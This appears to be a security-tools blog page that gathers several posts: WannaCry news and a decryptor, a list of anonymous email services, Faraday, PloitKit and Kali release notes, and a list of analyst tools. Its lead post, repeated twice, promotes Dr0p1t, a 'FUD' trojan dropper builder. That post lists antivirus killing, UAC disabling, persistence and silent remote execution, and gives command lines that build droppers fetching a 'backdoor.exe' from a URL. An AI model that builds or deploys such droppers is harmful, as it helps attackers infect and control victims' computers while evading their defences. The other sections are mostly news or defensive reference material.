A Framework That Creates An Advanced FUD Dropper With Some Tricks - Dr0p1t-Framework 1.2

Have you ever heard about trojan droppers ?

In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;)

Features

• Framework works with Windows and Linux
• Download executable on target system and execute it silently..
• The executable size small compared to other droppers generated the same way
• Self destruct function so that the dropper will kill and delete itself after finishing it work
• Adding executable after downloading it to startup
• Adding executable after downloading it to task scheduler ( UAC not matters )
• Finding and killing the antivirus before running the malware
• Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
• The ability to disable UAC
• In running powershell scripts it can bypass execution policy
• Using UPX to compress the dropper after creating it
• Choose an icon for the dropper after creating it

Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites

• Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

• Python libraries requirements in requirements.txt

Needed dependencies for linux

• Wine
• Python 2.7 on Wine Machine

Note : You must have root access

Installation
if you are on linux and do

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible 

Tested on:

• Kali Linux - SANA
• Ubuntu 14.04-16.04 LTS
• Windows 10/8.1/8

Changelog v1.2

• Pyinstaller compiling in Linux using wine
• Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
• Added the ability to disable and bypass UAC
• Updated the antivirus list in the antivirus killer
• Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work 
• Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
• Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) Stay Tuned

Contact

• Twitter
• Facebook

Download Dr0p1t-Framework

Read More

WannaCry Ransomware Decryption Tool - WanaKiwi

If your PC has been infected by WannaCry – the ransomware that wreaked havoc across the world last Friday – you might be lucky to get your locked files back without paying the ransom of $300 to the cyber criminals.

Adrien Guinet, a French security researcher from Quarkslab, has discovered a way to retrieve the secret encryption keys used by the WannaCry ransomware for free, which works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 operating systems.

WannaCry Ransomware Decryption Keys

The WannaCry's encryption scheme works by generating a pair of keys on the victim's computer that rely on prime numbers, a "public" key and a "private" key for encrypting and decrypting the system’s files respectively.
To prevent the victim from accessing the private key and decrypting locked files himself, WannaCry erases the key from the system, leaving no choice for the victims to retrieve the decryption key except paying the ransom to the attacker.

But here's the kicker: WannaCry "does not erase the prime numbers from memory before freeing the associated memory," says Guinet.

Based on this finding, Guinet released a WannaCry ransomware decryption tool, named WannaKey, that basically tries to retrieve the two prime numbers, used in the formula to generate encryption keys from memory, and works on Windows XP only.

Note: Below I have also mentioned another tool, dubbed WanaKiwi, that works for Windows XP to Windows 7.

"It does so by searching for them in the wcry.exe process. This is the process that generates the RSA private key. The main issue is that the CryptDestroyKey and CryptReleaseContext does not erase the prime numbers from memory before freeing the associated memory." says Guinet

So, that means, this method will work only if:

• The affected computer has not been rebooted after being infected.
• The associated memory has not been allocated and erased by some other process.

"In order to work, your computer must not have been rebooted after being infected. Please also note that you need some luck for this to work (see below), and so it might not work in every case!," Guinet says.

"This is not really a mistake from the ransomware authors, as they properly use the Windows Crypto API."
While WannaKey only pulls prime numbers from the memory of the affected computer, the tool can only be used by those who can use those prime numbers to generate the decryption key manually to decrypt their WannaCry-infected PC’s files.

WanaKiwi: WannaCry Ransomware Decryption Tool

Good news is that another security researcher, Benjamin Delpy, developed an easy-to-use tool called "WanaKiwi," based on Guinet's finding, which simplifies the whole process of the WannaCry-infected file decryption.

All victims have to do is download WanaKiwi tool from Github and run it on their affected Windows computer using the command line (cmd).

WanaKiwi works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008, confirmed Matt Suiche from security firm Comae Technologies, who has also provided some demonstrations showing how to use WanaKiwi to decrypt your files.

Although the tool won't work for every user due to its dependencies, still it gives some hope to WannaCry's victims of getting their locked files back for free even from Windows XP, the aging, largely unsupported version of Microsoft's operating system.


Source:The Hacker News

Download  WanaKiwi

Read More

That's Hitting World Right Now Uses NSA Windows Exploit - WannaCry Ransomware

Earlier today, a massive ransomware campaign hit computer systems of hundreds of private companies and public organizations across the globe – which is believed to be the most massive ransomware delivery campaign to date.

The Ransomware in question has been identified as a variant of ransomware known as WannaCry (also known as 'Wana Decrypt0r,' 'WannaCryptor' or 'WCRY').

Like other nasty ransomware variants, WannaCry also blocks access to a computer or its files and demands money to unlock it.

Once infected with the WannaCry ransomware, victims are asked to pay up to $300 in order to remove the infection from their PCs; otherwise, their PCs render unusable, and their files remain locked.

In separate news, researchers have also discovered a massive malicious email campaign that's spreading the Jaff ransomware at the rate of 5 million emails per hour and hitting computers across the globe.

Ransomware Using NSA's Exploit to Spread Rapidly

What's interesting about this ransomware is that WannaCry attackers are leveraging a Windows exploit harvested from the NSA called EternalBlue, which was dumped by the Shadow Brokers hacking group over a month ago.

Microsoft released a patch for the vulnerability in March (MS17-010), but many users and organizations who did not patch their systems are open to attacks.

The exploit has the capability to penetrate into machines running unpatched version of Windows XP through 2008 R2 by exploiting flaws in Microsoft Windows SMB Server. This is why WannaCry campaign is spreading at an astonishing pace.

Once a single computer in your organization is hit by the WannaCry ransomware, the worm looks for other vulnerable computers and infects them as well.

Infections from All Around the World

In just a few hours, the ransomware targeted over 45,000 computers in 74 countries, including United States, Russia, Germany, Turkey, Italy, Philippines and Vietnam, and that the number was still growing, according to Kaspersky Labs.

According to a report, the ransomware attack has shut down work at 16 hospitals across the UK after doctors got blocked from accessing patient files. Another report says, 85% of computers at the Spanish telecom firm, Telefonica, has get infected with this malware.

Another independent security researcher, MalwareTech, reported that a large number of U.S. organizations (at least 1,600) have been hit by WannaCry, compared to 11,200 in Russia and 6,500 in China.

Screenshots of the WannaCry ransomware with different languages, including English, Spanish, Italian, were also shared online by various users and experts on Twitter.

Bitcoin wallets seemingly associated with WannaCry were reportedly started filling up with cash.

The Spanish computer emergency response organization (CCN-CERT) has even issued an alert that warns users of the "massive attack of ransomware" from WannaCry, saying (translated version):

"The ransomware, a version of WannaCry, infects the machine by encrypting all its files and, using a remote command execution vulnerability through SMB, is distributed to other Windows machines on the same network."

It is unclear how the WannaCry ransomware is infecting systems, but obvious attack vector can be phishing emails or victims visiting a website containing malware.

"Power firm Iberdrola and utility provider Gas Natural were also reported to have suffered from the outbreak.," according to BBC.

How to Protect Yourself from WannaCry

First of all, if you haven't patched your Windows machines and servers against EternalBlue exploit (MS17-010), do it right now.

To safeguard against such ransomware infection, you should always be suspicious of uninvited documents sent an email and should never click on links inside those documents unless verifying the source.

To always have a tight grip on all your important files and documents, keep a good backup routine in place that makes their copies to an external storage device that is not always connected to your PC.

Moreover, make sure that you run an active anti-virus security suite of tools on your system, and most importantly, always browse the Internet safely.


Source: The Hacker News

Read More

20 Sites To Keep Your Identity Hidden - Send Anonymous Emails

The first question to answer here is why go for anonymous email when there are plenty of premium featured and free email services such as Gmail, Outlook and Yahoo! Mail available? Well, privacy and anonymity is a digital right — our digital right. These email services are ‘free’ because of the advertisements.

Although deemed necessary evils, ads are mostly tailored for the visitor or service user, and to do that, service providers need your data to show you advertisements targeted to you and your user group. These are ads that you are most likely to click and/or follow.

Moreover, the disclosure of the motives of secret agencies and their top-secret internet-censoring programs (such as PRISM) has raised concerns among digital privacy advocates. If you want to keep your emails away from prying eyes, this article will introduce to you the many options for sending and receiving anonymous emails.

Anonymous email forms the basic foundation of anonymity over the web. Internet is no secure storage, but you have a say in who has access to your data and who doesn’t. If that is no, anonymous emails is one way to ensure your emails are not trackable online.

Note: Anonymity is not possible on the web without hiding your IP address, so you must use Tor, or any other proxy or VPN service before using the services below to remain anonymous on the Internet.
Encrypted / Anonymous Email Service
Here are some of the anonymous email services that lets you send and receive emails anonymously online. Some of them have encryption features, others are disposable or will self-destruct after a specified period of time. Here are 5.

Anonymous Email – TorGuard – This service provides you an anonymous inbox with lots of privacy and cryptographic features. You get 10MB storage, and end-to-end security using SSL encryption for connection and G/PGP encryption for securing the messages.

Tor Mail – Tor Mail is a Tor Hidden service that provides truly anonymous email service. It runs on the hidden service network of The Tor Project so you must use Tor to access and use it. Tor Mail is developed for super anonymity. As it’s built over the Tor network, it cannot be traced easily.

GuerrilaMail – GuerrillaMail offers you a disposable, self-destructible, temporary email address to send and receive emails anonymously on the internet. Mail is deleted after an hour. You only need to choose an email address; no personal data is required.

Secure Mail – This service encrypts your mail using 4096-bit key, which makes it unreadable by anyone except you. It doesn’t ask for your personal information or IP address to sign up. They also have a zero-tolerance policy against spam.

The Anonymous Email – Create an account to send and receive emails by signing up with your real email. None of your other personal info is necessary.

Send Emails Without Registration

Sometimes you just need to send emails without prior registration. In fact you don’t even need to receive any feedback. If this is you, here are 8 services that is essentially a form where you put in details of the email you want to send. Note that there is no way for the receiver to get back to you.

AnonymousEmail.me – Here you will find only a simple form to fill in the receiver’s address, subject and the email content (you can also attach a file to the email if necessary). To get a reply, opt to provide a reply-to email address, otherwise this is a one-way ticket to sending an anonymous email.

5ymail – Send and receive beautifully formatted messages using its rich-text editor without revealing your true self. You will have to give up a real email to receive your 5ymail inbox credentals. There is also a paid version for more features.

CyberAtlantis – It offers a simple interface to provide the receiver’s email address, subject, and the message. It strips off the IP address from your mail, and thus you can’t be traced easily. It asks for none of your personal information.

W3 Anonymous Remailer – Send anonymous emails to anyone. You only need to enter the receiver’s email address, subject and the message for the email.

Send Anonymous Email – This one operates with a plain interface to enter the sender and receiver’s address, subject and message. No other details are required to send emails with this. The IP addresses are logged in.

Send Email Message – You only need to enter the receiver’s email address, subject, and the message. Over 100,000 anonymous emails are sent every day for free.

AnonEmail – You get to send anonymous emails without revealing any information about your identity.

Receive Emails

If you just need a disposable email to confirm links and don’t want to deal with the newsletter or other deals they might send you in the future, try these 7 email services. Accounts are created automatically when a mail is received for that address.

Anonymous Email – Hide My Ass! – Hide My Ass! offers a free anonymous email account, which can be used to receive (but not send) emails. You can opt for new email received notifications to be sent to your real email or even set your inbox to “self-destruct” with an expiration date. 

myTrashMail – Get open and public email accounts created upon receiving mail or sign up for a private and password-protected one to receive mail. The accounts are temporary and will be deleted automatically after some time.

NotSharingMy.Info – NotSharingMy.Info provides you with a permanent anonymous email address to receive emails without providing any traceable and identifiable information. It only requires your real email address for signing up. All emails to the anonymous email address is forwarded to your real email address.

Mailnesia – Aside from inboxes generated automatically upon receipt of an email, Mailnesia even features an automatic confirmation-links click system which is useful if you make lots of sign-ups on web services.

Mailinator – Here is one that lets you create email inboxes quickly and even automatically. You can only receive emails with it.

Spambog – Spambog offers you a disposable (7-day purge), temporary, anonymous email inbox on the Web. You can receive, reply and forward emails but not send an original one. An email alias can be protected with a password.

TempInbox – Here’s another temporary, disposable, auto-automated email inbox service. Give any email alias to anyone and check that inbox on the website for your incoming mail.

OffSec 2017

Read More

Collaborative Penetration Test and Vulnerability Management Platform - Faraday v2.4

Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that helps users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way!

LDAP support

Yes, Faraday’s bucket list is an item shorter as of this release! LDAP support has been on the horizon for quite some time now, but not anymore - this brand new version comes with LDAP support out of the box, no additional modules required, isn’t that neat?

Why LDAP? Well, because a great number of companies around the world use it to centralize their user account management. The protocol provides total control over the credentials in all the platforms, which comes in pretty handy when managing large volumes of data. In fact, LDAP is so popular that some companies have a policy to only use tools that support LDAP authentication.

By adding LDAP support to Faraday, we give our clients the possibility to manage larger teams, implement large-scale installations and maintain a granular and simple control over their user accounts.

In addition, using Faraday over LDAP provides better configuration than ever, allowing complex credential policies such as password expiration and quality standards, or credential lockout.

Faraday Plugin

There are some changes to the Faraday Plugin, improving its functionality by allowing users to run it through the GTK interface, performing actions in batch and filtering objects.

One of the best things about this new version of the Plugin is that you can now use it to script some of the most boring tasks needed in every assessment.

Example of task automation using Faraday Plugin - Running ping for every host that has a service on port 22

We also added a menu option to run directly from GTK!


New menu item in GTK allows users to run Fplugin without having to type anything!
Read more about FPlugin in our documentation

Details are everything

And that is what this release is all about. We believe that correcting very specific details and introducing small improvements also adds quality and efficiency to a platform like ours. So it is in those items that we focused on the last iteration.

Changes

• Added LDAP support for authentication 
• Removed grouping by issue tracker option in status report

• Added command line option to automatically install the license files before launching Faraday 
• Fixed bug when editing workspaces with maximum allowed workspaces reached 
• Improved login in Web UI 
• Improved the validation applied to passwords when editing them in the Web UI

Better password validation

• Improved UX in users list Web UI 
• Improved GTK UX when the client loses connection to the server 

• Added link to name column in Hosts list

Host names with links

• Fixed bug in SQLMap plugin that made the client freeze 
• Fixed bug when creating/updating Credentials 
• Fixed bug in the WEB UI - menu explanation bubbles were hidden behind inputs

• Fixed conflict resolution when the object was deleted from another client before resolving the conflict 
• Improved FPlugin
• Improved the installation process 
• Improved SQLMap plugin to support –tables and –columns options 
• Improved navigation in Web UI 
• Merged PR #137 - CScan improvements: bug fixing, change plugin format and removed unnecessary file output 
• Merged PR #173 - Hostnames: added hostnames to plugins 
• Merged PR #105 - OSint: added the possibility of using a DB other than Shodan 
• The Status Report now remembers the sorting column and order
• Created a requirements_extras.txt file to handle optional packages for specific features

We hope you enjoy it, and let us know if you have any questions or comments.

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec 

Download Faraday v2.4

Read More

A Framework That Creates An Advanced FUD Dropper With Some Tricks - Dr0p1t-Framework 1.2

Have you ever heard about trojan droppers ?

In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;)

Features

• Framework works with Windows and Linux
• Download executable on target system and execute it silently..
• The executable size small compared to other droppers generated the same way
• Self destruct function so that the dropper will kill and delete itself after finishing it work
• Adding executable after downloading it to startup
• Adding executable after downloading it to task scheduler ( UAC not matters )
• Finding and killing the antivirus before running the malware
• Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
• The ability to disable UAC
• In running powershell scripts it can bypass execution policy
• Using UPX to compress the dropper after creating it
• Choose an icon for the dropper after creating it

Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites

• Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

• Python libraries requirements in requirements.txt

Needed dependencies for linux

• Wine
• Python 2.7 on Wine Machine

Note : You must have root access

Installation
if you are on linux and do

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible

Tested on:

• Kali Linux - SANA
• Ubuntu 14.04-16.04 LTS
• Windows 10/8.1/8

Changelog v1.2

• Pyinstaller compiling in Linux using wine
• Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
• Added the ability to disable and bypass UAC
• Updated the antivirus list in the antivirus killer
• Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work
• Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
• Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) Stay Tuned

Contact

• Twitter
• Facebook

Download Dr0p1t-Framework

Read More

The Hacker's ToolBox - PloitKit

PloitKit is a Python based GUI tool designed as one-stop for all other softwares. I was facing these kinds of problem, when I need to switch to different system, or I lost my pen-drive. I have to go to google, and search every tool and download every tool and so on. So I decided to create a tool, in which I just click and click and tool is there.

I have added more than 900+ tools in this tool, but only 400+ is available now, to test will this tool work, if it works I'll make it available for everyone.

Features

1. Auto-Update - No need to come over here, and look for new version every time.
2. Better Error Handling - Some tools may cause error, that's why I added this option.
3. Graphical Interface - For just click & click.
4. Malware Protectiong - All tools are downloaded from their original source, so no malwares or any viruses.
5. Multi-Platform - Many tools are for designed differently for Mac, Windows & Linux, so I added option for that. Choose your platform and you're good to go.
6. Better organised - Everything is better organised nothing like search everything, and all that mess.

I believe that, nothing can't be perfect, So I added option to report a tool, or send me suggestions about any new tool, I should add.

Usage

git clone https://github.com/rajeshmajumdar/PloitKit.git

Windows

ploitkit.py

UNIX or Mac

python ploitkit.py

Download PloitKit

Read More

Kali Linux 2017.1 Release

Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack. Kali Linux is the most versatile and advanced penetration testing tool release operating system. Kali tools are often updated and can be used on other platforms, such as VMware and ARM.

Today, Offensive Security has been released Kali Linux 2017.1.

What’s new?

Support for RTL8812AU Wireless Card Injection
Streamlined Support for CUDA GPU Cracking
Amazon AWS and Micsosoft Azure Availability (GPU Support)
OpenVAS 9 Packaged in Kali Repositories
More info, please visit Kali Linux home page.

How to update to Kali Linux 2017.1

Open terminal and run command

apt update

apt dist-upgrade

reboot

If you want to download Kali Linux image for fresh installing, you can download Kali Linux 2017.1 here

Read More

51 Tools for Security Analysts - Offensive Sec

Reading this list may be worrying or intimidating for readers who don’t work in the security industry. You should know that all tools on this list are free and publicly accessible. They are also well known within the professional security community and among malicious actors. This list of tools, software and utilities should empower anyone interested in protecting themselves and their online assets by making you aware of the capabilities that exist for analysts and malicious actors. By better understanding the tools that your adversary uses, you can better protect yourself.

Information gathering and analysis

Google dorks – Using advanced operators in the Google search engine to locate specific strings of text within search results.

Using Google for penetration or malicious activity may seem silly or obvious, but Google is incredibly powerful and very popular among analysts and malicious actors alike. “Google dorks”, or google-hacks as they’re also known, are a search query that attackers use on Google to identify targets. If you visit a site like exploit-db.com or any other database of exploits, you’ll find that many of them include Google dorks to help find targets to attack with the exploit.

Maltego – An interactive data mining tool that renders directed graphs for link analysis.
Maltego is one of our favorites. It is an investigator’s tool that lets you graphically organize your thoughts and your investigation by creating objects (people, places, devices, events) and link them. It also gives you the ability to run ‘transforms’ on objects. For example, you can run transforms on an IP address to list its malicious activity using external sources of threat intelligence. You can download a free version from Paterva which has some limitations.
You can see an example of the work we do with Maltego below.

FOCA – A tool used to find metadata and hidden information in the documents its scans.
When you create and publish MS Office, PDF, EPS and PS documents online, you may not realize how much information you are leaking to the general public. FOCA is a security analyst’s tool that can be used to extract ‘leaked’ data from documents that have been made public. Using FOCA, an analyst can find things like an organization’s network structure, IP addresses, internal server names, printers, shared folders, access control lists and more. You can watch this video filmed at DefCon 17 for a demo of how FOCA can be used by researchers or malicious actors to perform recon on a target organization or individual.

http://checkusernames.com/ – Check the use of a brand or username on 160 social networks.
If you simply want to find a unique username, checkusernames.com is a useful tool. If you are in the security field, it can be a powerful way to attribute an attack to a specific individual. Malware authors occasionally include usernames or ‘hacker names’ in their malware. Using this tool you can search 160 online services to see if they have used the same username somewhere else.

https://haveibeenpwned.com/ – Check if an account has been compromised in a data breach.
The term ‘pwned’ is slang for ‘owned’ which in the security industry means “to have your data or system compromised”. So ‘haveibeenpwned.com’ is slang for “Have I been owned dot com”. This is a well known and respected site run by Troy Hunt which finds and aggregates data from data breaches. You can use the service to find out if an account has been compromised by looking up your email or username.

https://www.beenverified.com/ – Search people & public records.
This is a general “people search” that is useful to find additional meta-data when researching a target during penetration testing or when researching an attacker.

Shodan – Search engine for Internet-connected devices.
This is a very popular service among security researchers. Shodan continually crawls and indexes devices on the internet. We recently used Shodan as part of our research into routers at several ISPs around the world that have been hacked and are now attacking WordPress. You can find a few example searches demonstrating Shodans use on their ‘explore’ page.

Censys – A search engine that allows computer scientists to ask questions about the devices and networks that compose the internet.
Censys is similar to Shodan in that it indexes devices and websites connected to the internet. The data is also searchable and differs from Shodan in some ways. Shodan is focused on ports and the services running on those ports. Censys is great at indexing web site SSL certificates among other things. Censys is maintained by a team of computer scientists at the University of Michigan and University of Illinois Urbana-Champaign.

Gephi – Visualization and exploration software for all kinds of graphs and networks.
We mentioned Maltego earlier in this post. It uses a ‘graph’ structure which is a diagram of linked objects to represent relationships. Gephi is a tool to analyze graph data at massive scale. We used Gephi to generate the graphical representations of attack data that we published in our February Attack report, seen below.


Fierce – A DNS reconnaissance tool for finding target IPs associated with a domain.
Fierce is a tool used to find IP addresses that are potential attack targets associated with a specific domain. It is used by penetration testers when evaluating insecure points on a network.

BuiltWith – Find out what websites are built with.
BuiltWith has a search engine-like interface and lets you search for a specific site to find out what tools were used to build it. BuiltWith also aggregates that data so that you can find out what the most popular technologies are on the web or how a specific technology is trending relative to another.

Wappalyzer – A cross-platform utility that uncovers the technologies used on websites.
Wappalyzer is another tool that helps you discover what technologies a specific site is using. Like BuiltWith, they also aggregate data to help you determine how technologies are trending. This is their view of the popularity of blog technologies, with WordPress clearly the market leader.


Wappalyzer Chrome extension
Wappalyzer also has a browser extension for Chrome that lets you immediately see the technologies a specific site is using. There is also a Python driver available on github called python-Wappalyzer.

https://aw-snap.info/ – Tools for owners of hacked websites to help find malware and recover their site.
aw-snap.info includes a suite of tools that may be helpful for site owners who have decided to try to clean their own hacked site. It can help you fetch pages as Google, which sometimes reveals malware. It can also decode base64 obfuscated malware and help find obfuscation in your files that may hide malware.

http://themecheck.org/ – A quick service that lets you verify WordPress themes for security and code quality.
ThemeCheck may help you verify your theme integrity by uploading it. It can also help find malware embedded in themes.

theHarvester – Gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN.
This is a tool that performs a variety of reconnaissance operations on an organization and may be useful in the early stages of a penetration test to determine an organization’s overall online footprint.

Cymon.io – Tracker of malware, phishing, botnets, spam, and more.
Cymon can help you research a potentially malicious IP or malware hash. 

Mnemonic – A passive DNS database.
Mnemonic is a useful tool that can find which websites are hosted at a specific IP or which IPs host a website.

Vulnerability scanning and penetration testing

WPScan – A black box WordPress vulnerability scanner.
WPScan is a command line tool that is used to remotely scan WordPress sites for vulnerabilities.

Sqlmap – An open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

SQLMap is widely used among penetration testers and is highly effective at finding and exploiting SQL injection vulnerabilities in target sites.

BeEF – A penetration testing tool that focuses on the web browser.
BeEF is a powerful tool that lets penetration testers exploit and control a web browser. Using BeEF you can set up a malicious website, exploit a visiting browser and gain access to the workstation running the browser. You can watch this 2014 KiwiCon video for a demo.

Firefox Hackbar – A simple security audit / penetration test tool.

Hackbar is a plugin for Firefox that may help application developers perform security audits on their own web applications. It includes a variety of tools to assist with this task.
Burp Suite – Software for web security testing.

Burp Suite is a very well known and powerful framework used to perform security audits and analysis on web applications. It includes a proxy that can intercept traffic and allow you to modify it on the fly. It includes a huge variety of exploit and penetration testing tools.

OpenVAS – An open source vulnerability scanner and manager.
You have probably heard of the vulnerability scanning tool Nessus. Back in 2005 Tenable Network Security changed the Nessus open source license to a closed source one. The developers forked the project at that time and created OpenVAS.
I’ve found that OpenVAS can be quite effective, but it is a bit more challenging to set up than Nessus. OpenVAS does have the advantage of being completely free and open source. The project is well known throughout the online security community.

Fiddler – A free web debugging proxy.
Fiddler is a proxy server that lets you intercept requests to a website, view them in different ways, modify the requests and can help debug websites and perform security audits.

Joomscan – Detect Joomla CMS vulnerabilities and analyze them.
Joomscan is the Joomla CMS’s equivalent of wpscan.

Kum0nga – A simple Joomla scan.
This is another joomla vulnerability scanner.

Arachni – A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of modern web applications.
Arachni is a framework to perform detailed vulnerability scanning on web applications.

Forensics and log analysis

Lnav – An advanced log file viewer.
Lnav is short for log file navigator. It automatically detects your log file formats, provides syntax highlighting and a host of other features to view and analyze log files. It can be invaluable when analyzing a compromised website.

Mandiant Highlighter – A free log file analysis tool.
Mandiant (now owned by Fireeye) produced this useful product that can help analyze log files. It includes the ability to graphically view a histogram of log files and several other powerful log file analysis features.

Wp-file-analyser – Find modified, missing and extra files in a WordPress directory.
This utility can download the original versions of WordPress core and plugin files and can help you compare them against their originals.

Auditd – Access monitoring and accounting for Linux.
Access monitoring and logging/accounting is very helpful when monitoring a system to see if it is being attacked or performing an investigation after the attack. Auditd can help you improve logging and provide an audit trail on Linux.

Araxis Merge – Advanced 2 and 3-way file comparison (diff), merging and folder synchronization.
When responding to a hack, the ability to compare files to originals to determine what has changed is important. Araxis Merge is a powerful tool that can assist with this.

WinMerge – An Open Source differencing and merging tool for Windows.
Much like Araxis Merge, WinMerge can help you compare files to examine changes when responding to an incident.

DiffNow – Compare files online.
DiffNow is a web based file ‘diff’ tool that can also assist when comparing file differences during incident response.

Code and malware analysis

CyberChef – the Cyber Swiss Army Knife
CyberChef is a tool that is developed by GCHQ, the British intelligence agency. It can help de-obfuscate malware and other code.

UnPHP – A free service for analyzing obfuscated and malicious PHP code.
Obfuscating (hiding/garbling) PHP is a favorite tool of hackers, UnPHP can help analyze obfuscated code.

UnPacker – JavaScript unpacker.

Jsunpack – A generic JavaScript unpacker.
‘Packing’ javascript is a favorite technique of hackers who are dropping malicious javascript on websites. It makes their code more compact and harder to read. Jsunpack can help de-obfuscate JS code to make it more readable so that you can understand how it operates.

JSBeautifier – An online JavaScript beautifier.
Much like Jsunpack, JSBeautifier helps improve the readability of packed javascript code.

https://www.base64decode.org/ – Base64 Decode and Encode
Base64 encoding is a way to encode anything into an encoded string of (what appears to be) random characters. Anyone who is repairing hacked sites or responding to incidents uses base64 decoding several times a day to expose malicious code that has been base64 encoded. This tool can help decode base64 encoding.

https://www.urldecoder.org/ – URL Decode and Encode
URL encoding is also a popular way for hackers to hide their code, through encoding it using this form of encoding. urldecoder.org can help you decode malicious code that has been hidden using urlencoding.

http://lombokcyber.com/en/detools/decode-sourcecop – Decode SourceCop v3.x
This is a tool that decodes a specific type of PHP encoding that may prove useful during a hacked site investigation.

Other tools

regex101 – Develop and test regular expressions.
Regex, or regular expressions, are pattern matching routines to find complex patterns in files and code. 

regexpal – Another site to develop and test regular expressions.
Both regex101 and regexpal provide online development environments to help you create or analyze regular expressions.

HashKiller – Online hash cracking service. Useful to reverse engineer hashes into passwords.
In most systems, passwords are stored as hashes. Malware authors occasionally use hashing to store their own passwords. In our research we have needed to crack hashes that are used by malware authors in order to read their source code. HashKiller can help reverse a hash into a password if you need to crack a hash as part of your malware analysis.

Noscript – Noscript is a Firefox extension that allows Javascript, Java and Flash to only be executed by websites that you define and trust.
When visiting malicious websites, Noscript can help disable malicious code on that site. Note that you should always visit a malicious site that you are analyzing using a virtual machine that has no important data on it. If the VM gets infected, you can simply destroy it without worrying about important data being leaked. Using Noscript in your browser within your virtual environment can be useful when analyzing the function of a hacked site.

Other lists of tools

• Awesome Forensics – A curated list of awesome free (mostly open source) forensic analysis tools and resources.
• 
  
• awesome-incident-response – A curated list of tools and resources for security incident response, aimed to help security analysts and DFIR teams.
• 
  
• OSINT Framework – OSINT is short for ‘open source intelligence’. This site provides a graphical directory of OSINT resources.
• 
  

Kali Linux

Kali Linux is a linux distribution that is the favorite of penetration testers and security analysts world-wide. It is a linux distribution that comes packed with security analysis tools. If you want to learn about cyber security, Kali should be one of your starting points. If you simply would like to know about some of the more important tools that Kali provides, you can use the list below.
Kali Linux Tools Listing – All the tools in Kali Linux, a Linux variant used by penetration testers and security analysts.

Conclusion

